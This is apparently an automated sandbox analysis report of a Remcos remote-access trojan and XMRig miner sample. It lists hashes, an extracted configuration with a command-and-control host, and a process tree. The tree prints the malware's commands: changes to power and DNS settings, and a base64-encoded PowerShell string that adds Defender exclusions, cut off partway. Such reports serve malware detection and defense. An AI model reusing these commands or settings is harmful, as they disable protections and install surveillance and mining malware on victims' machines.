remcos | 093d5cf870867a18a04b1ff17a71b398f38663446ef9cda68e34120b28d46f43

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2022 03:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
Size

2.2MB
MD5

5051c71e2b1b319a14474b47876403e4
SHA1

3684e802d6831d76da44d53cef16939916976b94
SHA256

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1
SHA512

8aaaa2ed847f452972d36854925e6043fba389f8a8852aad02c10e67d6fc2b0baac5548b48762d522cac4d8980a98170097281fc175f06ff2387c5fdb13b3636
SSDEEP

24576:WN9ewmMdH+HY530osWnYQb6VOKs4zm2evT:I

Score

10^/10

remcos xmrig 220928 miner rat upx

Malware Config

Extracted

Family

remcos

Botnet

220928

minecraftrpgserver.com:80

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
software_reporter_tool.exe
copy_folder
Google
delete_file
true
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
adbkey.dat
keylog_flag
false
keylog_path
%Temp%
mouse_option
false
mutex
9416a517bdcd8521-8QM7X6
screenshot_crypt
true
screenshot_flag
true
screenshot_folder
Google
screenshot_path
%Temp%
screenshot_time
60
startup_value
Google
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

InstallUtil.exe

description	pid	process	target process
PID 1652 created 2740	1652	InstallUtil.exe	Explorer.EXE
PID 1652 created 2740	1652	InstallUtil.exe	Explorer.EXE
PID 1652 created 2740	1652	InstallUtil.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4668-204-0x00007FF6B4BD0000-0x00007FF6B53C4000-memory.dmp	xmrig
behavioral2/memory/4668-214-0x00007FF6B4BD0000-0x00007FF6B53C4000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

InstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe7z.exeInstallUtil.exe

pid process

4276 InstallUtil.exe
4568 unzip.exe
1428 unzip.exe
3356 unzip.exe
2040 unzip.exe
3196 7z.exe
1652 InstallUtil.exe

pid	process
4276	InstallUtil.exe
4568	unzip.exe
1428	unzip.exe
3356	unzip.exe
2040	unzip.exe
3196	7z.exe
1652	InstallUtil.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4668-204-0x00007FF6B4BD0000-0x00007FF6B53C4000-memory.dmp	upx
behavioral2/memory/4668-214-0x00007FF6B4BD0000-0x00007FF6B53C4000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeunzip.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	unzip.exe

Loads dropped DLL 1 IoCs

Processes:

7z.exe

pid process

3196 7z.exe

pid	process
3196	7z.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.exe

description	pid	process	target process
PID 1824 set thread context of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1652 set thread context of 4668	1652	InstallUtil.exe	dwm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3472 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2176 taskkill.exe
Modifies registry class 1 IoCs

Processes:

unzip.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings unzip.exe

pid	process
3472	schtasks.exe

pid	process
2176	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	unzip.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exeInstallUtil.exedwm.exepowershell.exe

pid	process
1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
4276	InstallUtil.exe
4276	InstallUtil.exe
4568	unzip.exe
4568	unzip.exe
3356	unzip.exe
3356	unzip.exe
1428	unzip.exe
1428	unzip.exe
2040	unzip.exe
2040	unzip.exe
3356	unzip.exe
4568	unzip.exe
1428	unzip.exe
2040	unzip.exe
1652	InstallUtil.exe
1652	InstallUtil.exe
1652	InstallUtil.exe
1652	InstallUtil.exe
1652	InstallUtil.exe
1652	InstallUtil.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

648

pid	process
648

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exe7z.exepowercfg.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exedwm.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
Token: SeDebugPrivilege	4276	InstallUtil.exe
Token: SeDebugPrivilege	1428	unzip.exe
Token: SeDebugPrivilege	3356	unzip.exe
Token: SeDebugPrivilege	4568	unzip.exe
Token: SeDebugPrivilege	2040	unzip.exe
Token: SeRestorePrivilege	3196	7z.exe
Token: 35	3196	7z.exe
Token: SeSecurityPrivilege	3196	7z.exe
Token: SeSecurityPrivilege	3196	7z.exe
Token: SeShutdownPrivilege	4648	powercfg.exe
Token: SeCreatePagefilePrivilege	4648	powercfg.exe
Token: SeIncreaseQuotaPrivilege	448	WMIC.exe
Token: SeSecurityPrivilege	448	WMIC.exe
Token: SeTakeOwnershipPrivilege	448	WMIC.exe
Token: SeLoadDriverPrivilege	448	WMIC.exe
Token: SeSystemProfilePrivilege	448	WMIC.exe
Token: SeSystemtimePrivilege	448	WMIC.exe
Token: SeProfSingleProcessPrivilege	448	WMIC.exe
Token: SeIncBasePriorityPrivilege	448	WMIC.exe
Token: SeCreatePagefilePrivilege	448	WMIC.exe
Token: SeBackupPrivilege	448	WMIC.exe
Token: SeRestorePrivilege	448	WMIC.exe
Token: SeShutdownPrivilege	448	WMIC.exe
Token: SeDebugPrivilege	448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	448	WMIC.exe
Token: SeRemoteShutdownPrivilege	448	WMIC.exe
Token: SeUndockPrivilege	448	WMIC.exe
Token: SeManageVolumePrivilege	448	WMIC.exe
Token: 33	448	WMIC.exe
Token: 34	448	WMIC.exe
Token: 35	448	WMIC.exe
Token: 36	448	WMIC.exe
Token: SeShutdownPrivilege	3772	powercfg.exe
Token: SeCreatePagefilePrivilege	3772	powercfg.exe
Token: SeIncreaseQuotaPrivilege	448	WMIC.exe
Token: SeSecurityPrivilege	448	WMIC.exe
Token: SeTakeOwnershipPrivilege	448	WMIC.exe
Token: SeLoadDriverPrivilege	448	WMIC.exe
Token: SeSystemProfilePrivilege	448	WMIC.exe
Token: SeSystemtimePrivilege	448	WMIC.exe
Token: SeProfSingleProcessPrivilege	448	WMIC.exe
Token: SeIncBasePriorityPrivilege	448	WMIC.exe
Token: SeCreatePagefilePrivilege	448	WMIC.exe
Token: SeBackupPrivilege	448	WMIC.exe
Token: SeRestorePrivilege	448	WMIC.exe
Token: SeShutdownPrivilege	448	WMIC.exe
Token: SeDebugPrivilege	448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	448	WMIC.exe
Token: SeRemoteShutdownPrivilege	448	WMIC.exe
Token: SeUndockPrivilege	448	WMIC.exe
Token: SeManageVolumePrivilege	448	WMIC.exe
Token: 33	448	WMIC.exe
Token: 34	448	WMIC.exe
Token: 35	448	WMIC.exe
Token: 36	448	WMIC.exe
Token: SeShutdownPrivilege	4048	powercfg.exe
Token: SeCreatePagefilePrivilege	4048	powercfg.exe
Token: SeShutdownPrivilege	4436	powercfg.exe
Token: SeCreatePagefilePrivilege	4436	powercfg.exe
Token: SeLockMemoryPrivilege	4668	dwm.exe
Token: SeLockMemoryPrivilege	4668	dwm.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	4808	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

dwm.exe

pid	process
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

dwm.exe

pid	process
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe
4668	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

InstallUtil.exe

pid process

4860 InstallUtil.exe

pid	process
4860	InstallUtil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exeInstallUtil.execmd.exeunzip.execmd.execmd.exeunzip.execmd.exeunzip.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1824 wrote to memory of 4872	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4872	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4872	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 1824 wrote to memory of 4860	1824	efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe	InstallUtil.exe
PID 4860 wrote to memory of 4276	4860	InstallUtil.exe	InstallUtil.exe
PID 4860 wrote to memory of 4276	4860	InstallUtil.exe	InstallUtil.exe
PID 3924 wrote to memory of 3820	3924	cmd.exe	choice.exe
PID 3924 wrote to memory of 3820	3924	cmd.exe	choice.exe
PID 4568 wrote to memory of 372	4568	unzip.exe	cmd.exe
PID 4568 wrote to memory of 372	4568	unzip.exe	cmd.exe
PID 4568 wrote to memory of 372	4568	unzip.exe	cmd.exe
PID 372 wrote to memory of 1764	372	cmd.exe	netsh.exe
PID 372 wrote to memory of 1764	372	cmd.exe	netsh.exe
PID 372 wrote to memory of 1764	372	cmd.exe	netsh.exe
PID 4568 wrote to memory of 3340	4568	unzip.exe	cmd.exe
PID 4568 wrote to memory of 3340	4568	unzip.exe	cmd.exe
PID 4568 wrote to memory of 3340	4568	unzip.exe	cmd.exe
PID 3340 wrote to memory of 2540	3340	cmd.exe	netsh.exe
PID 3340 wrote to memory of 2540	3340	cmd.exe	netsh.exe
PID 3340 wrote to memory of 2540	3340	cmd.exe	netsh.exe
PID 3356 wrote to memory of 3004	3356	unzip.exe	cmd.exe
PID 3356 wrote to memory of 3004	3356	unzip.exe	cmd.exe
PID 3356 wrote to memory of 3004	3356	unzip.exe	cmd.exe
PID 3004 wrote to memory of 3196	3004	cmd.exe	7z.exe
PID 3004 wrote to memory of 3196	3004	cmd.exe	7z.exe
PID 3004 wrote to memory of 3196	3004	cmd.exe	7z.exe
PID 2040 wrote to memory of 3060	2040	unzip.exe	cmd.exe
PID 2040 wrote to memory of 3060	2040	unzip.exe	cmd.exe
PID 2040 wrote to memory of 3060	2040	unzip.exe	cmd.exe
PID 3060 wrote to memory of 3472	3060	cmd.exe	schtasks.exe
PID 3060 wrote to memory of 3472	3060	cmd.exe	schtasks.exe
PID 3060 wrote to memory of 3472	3060	cmd.exe	schtasks.exe
PID 3356 wrote to memory of 1652	3356	unzip.exe	InstallUtil.exe
PID 3356 wrote to memory of 1652	3356	unzip.exe	InstallUtil.exe
PID 3356 wrote to memory of 728	3356	unzip.exe	cmd.exe
PID 3356 wrote to memory of 728	3356	unzip.exe	cmd.exe
PID 3356 wrote to memory of 728	3356	unzip.exe	cmd.exe
PID 728 wrote to memory of 4476	728	cmd.exe	choice.exe
PID 728 wrote to memory of 4476	728	cmd.exe	choice.exe
PID 728 wrote to memory of 4476	728	cmd.exe	choice.exe
PID 3012 wrote to memory of 448	3012	cmd.exe	WMIC.exe
PID 3012 wrote to memory of 448	3012	cmd.exe	WMIC.exe
PID 4912 wrote to memory of 4648	4912	cmd.exe	powercfg.exe
PID 4912 wrote to memory of 4648	4912	cmd.exe	powercfg.exe
PID 2040 wrote to memory of 3372	2040	unzip.exe	cmd.exe
PID 2040 wrote to memory of 3372	2040	unzip.exe	cmd.exe
PID 2040 wrote to memory of 3372	2040	unzip.exe	cmd.exe
PID 4912 wrote to memory of 3772	4912	cmd.exe	powercfg.exe
PID 4912 wrote to memory of 3772	4912	cmd.exe	powercfg.exe
PID 2040 wrote to memory of 4216	2040	unzip.exe	cmd.exe
PID 2040 wrote to memory of 4216	2040	unzip.exe	cmd.exe
PID 2040 wrote to memory of 4216	2040	unzip.exe	cmd.exe
PID 4912 wrote to memory of 4048	4912	cmd.exe	powercfg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3132 attrib.exe

pid	process
3132	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2740

C:\Users\Admin\AppData\Local\Temp\efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe
"C:\Users\Admin\AppData\Local\Temp\efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:4872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4860

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4912

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:448

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe ukzobzydbqshdvvh 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUOWlLosYbrY2pwtQQU1JTuikNmZuGmV+6BbKlyKFD6zdAaaNcQqky2iJHSWRIHnss9X/nab3QoNVM/Ta0kPMjvUxJH02YjP5XrdviLouahJX3Q1zD8omsKRft5FC/3aHRX5nzuLKj6v+l1hD7RDcnRlZOinraqnGRmc1rfZVBSryXdWQXUdRaex46bFg0DdbEVFMZ4l0pshLxALGam+crSqgmoA+SAgVTiLqPU5NWi5uz8p9/Px4ZVwH3rGiyQeauZd/VqfnXCdH0DEhBS0DRt+Weuu6gKyeQ5RrSfJ75TF5+fW2sqeJyzRaKmKd16nUvBvWK9P1hVtfbUjrx7WSXf4rvTPe5UgC3uEGkP5wCCVj4sAPVkBHTU9Jhx2DlvsdtFj/pjvCNlN4yCzDVXe/jPsmwoNwk9DDLAL1L+GE1DFO420v97Rx/FsdF4IRF7K8KMsSNKreyhr8kDg3eXzNVqg==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4668

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
2⤵
- Suspicious use of WriteProcessMemory
PID:372

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
3⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
2⤵
- Suspicious use of WriteProcessMemory
PID:3340

C:\Windows\SysWOW64\netsh.exe
netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
3⤵
PID:2540

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADQAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAzADEANAA1ADYAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8ASQBkAHMAIAAyADEANAA3ADgAMwAxADQAOQAzACAALQBUAGgAcgBlAGEAdABJAEQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgBfAEEAYwB0AGkAbwBuAHMAIABBAGwAbABvAHcAIAAtAEYAbwByAGMAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwASQBOAGUAdABDAGEAYwBoAGUAXABJAEUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAnAHUAbgB6AGkAcAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBjAG0AZAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBkAHcAbQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGU